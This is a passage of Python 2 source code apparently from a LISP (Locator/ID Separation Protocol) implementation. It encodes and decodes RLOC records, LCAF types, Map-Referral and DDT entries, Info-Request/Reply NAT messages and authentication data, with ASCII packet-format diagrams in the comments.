rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = ""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = ""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += self.rloc_name + "\0"
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
packet = packet[0:-2] + self.encode_lcaf()
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
            # If telemetry, the RLOC address follows in the LCAF; unpack it.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
            # Get lisp_keys() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len, False)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
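#
# Size note for lisp_rloc_record.encode() above: the fixed part packed with
# "BBBBHH" is 8 bytes, so a plain IPv4 RLOC-record is 8 + 4 = 12 bytes and a
# plain IPv6 RLOC-record is 8 + 16 = 24 bytes. When any LCAF content is
# present (geo, elp, rle, json, keys, or an rloc-name), the 2-byte AFI at
# the end of the fixed part is replaced by the LCAF encoding.
#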
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
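#
# Illustrative sketch (comment only, not executed): a "lisp delegate" command
# produces a lisp_ddt_entry() whose delegation_set[] holds one lisp_ddt_node()
# (defined below) per referral node. Hypothetical usage:
#
#   ddt = lisp_ddt_entry()
#   node = lisp_ddt_node()
#   node.map_server_child = True
#   ddt.delegation_set.append(node)
#   ddt.print_referral_type()         # returns "map-server-child"
#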
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix with
# EID-prefix-AFI set to 0. The EID appended below is either a hostname
# (AFI=17) or nothing (AFI=0):
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding does not use authentication, so we respond to anyone who
# sends an Info-Request. The EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
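#
# Illustrative sketch (comment only, not executed): building an Info-Request.
# Only the nonce is caller-supplied; the hostname defaults to lisp_hostname
# and the port/RLOC fields are only filled in for Info-Replies:
#
#   info = lisp_info()
#   info.nonce = 0x1122334455667788
#   packet = info.encode()            # header, nonce, zeroed auth/TTL/EID
#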
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword, byte-swap it when running on a little-endian (x86)
# system, and convert it to hex, zero-filling any longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
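#
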